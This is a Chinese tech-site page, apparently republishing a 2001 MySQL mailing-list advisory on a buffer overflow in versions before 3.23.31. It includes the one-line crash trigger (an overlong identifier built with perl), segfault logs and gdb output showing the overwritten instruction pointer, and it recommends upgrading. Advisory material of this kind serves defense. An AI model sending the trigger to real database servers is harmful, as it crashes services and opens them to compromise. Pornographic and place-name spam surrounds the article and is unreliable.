国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > MySQL > 正文

MySQL3.23.31之前版本的安全漏洞

2024-07-24 12:35:32
字體:
供稿:網(wǎng)友
  所有小于 3.23.31 版本的 MySQL 都存在一個緩沖溢出漏洞導致MySQL 崩潰。使攻擊者獲得 mysqld 權限,而可以操縱所有數(shù)據(jù)庫。攻擊的前提是必須有一個合法的登錄名和口令。
 
  下面為最初發(fā)表于 MySQL 郵件列表的信件摘要。
  ==================================================
  漏洞是由Jo?o Gouveia 于1月12日發(fā)現(xiàn)的:
 
  步驟:
 
  在第一個終端上啟動 mysql:
 
  spike:/var/mysql # /sbin/init.d/mysql start
 
  在另外一個終端上輸入:
 
  jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
 
  Enter password:
 
  (沒有反應?按^C退出)
 
  在第一臺終端上會顯示:
 
  spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault  
  nohup  
  $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin  
  g "$@" >>$err_log 2>&1>  
  Number of processes running now: 0  
  mysqld restarted on Fri Jan 12 07:10:54 WET 2001  
  mysqld daemon ended
  使用 gdb 顯示結(jié)果如下:
 
  (gdb) run  
  Starting program: /usr/sbin/mysqld  
  [New Thread 16897 (manager thread)]  
  [New Thread 16891 (initial thread)]  
  [New Thread 16898]  
  /usr/sbin/mysqld: ready for connections  
  [New Thread 16916]  
  [Switching to Thread 16916]  
  
  Program received signal SIGSEGV, Segmentation fault.  
  0x41414141 in ?? ()  
  (gdb) info all-registers  
  eax 0x1 1  
  ecx 0x68 104  
  edx 0x8166947 135686471  
  ebx 0x41414141 1094795585  
  esp 0xbf5ff408 0xbf5ff408  
  ebp 0x41414141 0x41414141  
  esi 0x41414141 1094795585  
  edi 0x0 0  
  eip 0x41414141 0x41414141  
  eflags 0x10246 66118  
  cs 0x23 35  
  ss 0x2b 43  
  ds 0x2b 43  
  es 0x2b 43  
  fs 0x0 0  
  gs 0x0 0
  其中的 eip 指示就是緩沖溢出了。
 
  解決辦法就是升級到 3.23.31。所以,各位如果還沒有把數(shù)據(jù)庫升級到最新版本,請趕快行動。
 
 

(編輯:武林網(wǎng))

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 岑溪市| 宁化县| 乌拉特中旗| 厦门市| 龙陵县| 恩平市| 桓台县| 前郭尔| 汕尾市| 北京市| 灌云县| 衡山县| 舞钢市| 金寨县| 衡东县| 涟水县| 秀山| 绥德县| 贵定县| 临澧县| 云梦县| 平和县| 手游| 马鞍山市| 渭南市| 西青区| 丰城市| 白银市| 宜阳县| 南溪县| 嘉黎县| 高台县| 镇安县| 大理市| 资中县| 绿春县| 威宁| 江山市| 米脂县| 滁州市| 洞头县|